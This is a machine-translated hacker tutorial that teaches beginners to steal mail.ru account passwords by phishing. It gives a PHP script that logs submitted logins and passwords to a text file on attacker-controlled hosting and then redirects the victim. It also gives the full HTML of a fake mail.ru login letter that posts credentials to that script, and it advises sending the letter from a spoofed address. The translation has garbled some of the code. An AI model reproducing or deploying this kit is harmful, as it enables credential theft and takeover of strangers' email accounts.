This page has been robot translated, sorry for typos if any. Original content here.

Breaking mail at mail.ru [SI]

[::. INTRO. ::]

Hello! In this article I will talk about how to hack a mailbox on the free mail service mail.ru.

The article is intended for beginners, SI , as well as for any Internet user who has a desire to get access to someone else's account.

But okay, I won’t write about it for a long time, and so it’s clear "why a cracker needs a mailbox, you’ll understand.

The article will fit for beginners. Guru, please do not read :)

[::. PREPARATION. ::]

First we need a free (better paid) hosting with PHP support.

* Just make sure the hosting supports PHP.

You can register on any of these:

 nextmail.ru 
 hobby.ru 
 webrise.ru 
 lapin.ru 
 free.dl-hosting.ru 
 hostow.net 
 beplaced.ru 
 777host.ru 
 paltus.ru 
 miraclehost.ru 
 freebox.ru 
 alfaspace.net 
 k70.ru 
 hosting.promostudio.ru 
 chat.ru 
 maxhost.ru 
 nixup.com 
 e2e.ru 
 noka.ru 
 newmail.ru 
 boom.ru 
 h15.ru 
 hut.ru 
 jino-net.ru 
 pochta.ru 
 unlimhost.ru 
 onepage.ru 
 by.ru 
 sbn.bz 
 yard.ru 
 domainhosting.ru 
 orthodoxy.ru 
 webservis.ru 
 ru-web.net 
 activehost.ru 
 househost.ru 
 bestof.ru 
 addr.ru 
 hosting.dump.ru 
 pesni.ru 
 medbox.ru 
 fatal.ru 
 x5x.ru 
 hopshot.com 
 5gigs.com 
 wagoo.com 
 orgfree.com 
 awardspace.com 
 bobos.ca 
 www.host.sk 
 zportal.info 
 spaceall.de 
 3x.ro 
 sretenie.ru 
 dotgeek.org 
 sevhosting.net 
 o2g.net
 www.jino-net.ru
 www.nixup.com
 newmail.ru
 ho.com.ua
 wallSt.ru
 hut.ru
 holm.ru
 e2e.ru
 fatal.ru
 host.sk
 ut.ru
 H1.ru
 Hostmos.ru
 Webm.ru
 Rdcom.ru
 narod.ru
 front.ru
 nm.ru 
 chat.ru 
 boom.ru 
 by.ru

Registered? - go ahead!

What do we need?

First, we need a sniffer (this is a script that allows saving the received data to a text file).


PHP Code:
  <? php
 
  $ f = fopen ( "mail.txt" , "at" );
  # file where to save flock ( $ f , 2 );
  fputs ( $ f , $ _GET [ 'Login' ]. "@" );
  # login fputs ( $ f , $ _GET [ 'Domain' ]);
  # domain input ( $ f , ";" . $ _GET [ 'Password' ]. "\ n" );
  # password flock ( $ f , 3 );
  fclose ( $ f );
  ?> <script> document.location.href = "/click?http://win.mail.ru/cgi-bin/readmsg?id=121112312"; </ script>

Consider the script in more detail.


PHP Code:
<script>document.location.href="http://win.mail.ru/cgi-bin/readmsg?id=121112312";</script>

This line defines the place where we will redirect the user after authorization on the fake letter .

  • Save to the file mes.php and upload it to the hosting.
  • Also create a mail.txt file in the script directory, and set permissions on it (chmod) 777.

Perhaps with hosting - everything!

We proceed to the letter itself, which we will send to the victim on the soap.


Letter Code:
  < table class = readlet cellpadding = 0 cellspacing = 0 border = 0 width = "100%" > < tr >
 
  < td id = aj_body >
 
  < div id = let_body > < base href = "http://r.mail.ru/clb126684/r.mail.ru/clb126684/readmsg" >
 
  < table cellpadding = 0 cellspacing = 0 border = 0 class = login >
 
  < tr >
 
  < td > A user has sent you a hidden letter . <br> To view a letter, enter your login and password . <br> </ a > </ p > </ td >
 
  </ tr >
 
  </ table > < font color = 00 ;
  33 ;
  66 FACE = "Arial" >
 
  < h4 > Authorization </ h4 >
 
  </ font >
 
  < table cellpadding = 0 cellspacing = 0 border = 0 class = login >
 
  < form method = "GET" action = "http: //addresssayta/mes.php" >
 
  < input type = "hidden" name = "mail" value = "1" >
 
  < tr >
 
  < td width = 75 >
 
  < img src = http : //img.mail.ru/0.gif height = 1> <br> Name
 
  </ td >
 
  < td width = 150 >
 
  < input type = "text" name = "Login" >
 
  </ td >
 
  < td width = 75 >
 
  < select name = "Domain" >
 
  < option value = "mail.ru" SELECTED > @ mail .
  ru </ option >
 
  < option value = "inbox.ru" > @ inbox .
  ru </ option >
 
  < option value = "list.ru" > @list.
  ru </ option >
 
  < option value = "bk.ru" > @ bk .
  ru </ option >
 
  </ select >
 
  </ td >
 
  </ tr >
 
  < tr >
 
  < td >
 
  Password
 
  </ td >
 
  < td >
 
  < input type = "password" name = "Password" >
 
  </ td >
 
  < td >
 
  <a href = "http://www.mail.ru/pages/help/92.html" target = _new> Forgot your password ? </ a >
 
  </ td >
 
  </ tr >
 
  < tr >
 
  < td > </ td >
 
  < td >
 
  < input type = checkbox name = "level" value = 1 id = "alien" > < label for = "alien" > Alien computer </ label >
 
  </ td >
 
  < td > </ td >
 
  </ tr >
 
  < tr >
 
  < td > </ td >
 
  < td >
 
  < input type = "Submit" value = "Login" xstyle = "margin-top: 4px" >
 
  </ td >
 
  < td > </ td >
 
  </ tr > </ form >
 
  </ table > <br>
 
  To learn more about the services , visit <a href = "http://corp.mail.ru" target = "_blank"> Corp.
  Mail .
  Ru </ a > <br>
 
  National Postal Service <a href = "http://www.mail.ru" target = "_blank"> @ Mail .
  com </ a > - the best free mail .
 
  < base href = "http://r.mail.ru/clb126684/r.mail.ru/clb126684/readmsg" > </ div >
 
 

Specify in the action parameter of the form tag - the address of your site (which you registered above) and the path to the sniffer mes.php .

[!] It should be noted that the data must be transferred using the "GET" method! Otherwise, nothing will come of it.

It now remains to send a letter to the victim, preferably with the substitution of the address .

Copy the letter code in the input field and send it in html format, pre-filling the fields.

If the victim bites it, then you are lucky :)

You can learn passwords in the mail.txt file .

[::. END. ::]

I think everything.

But how to get to the cracking is up to you.

Thank you for attention!

Waiting for your feedback just below this text.

And it’s better not to break anything or anything;)

Goodbye and see you :)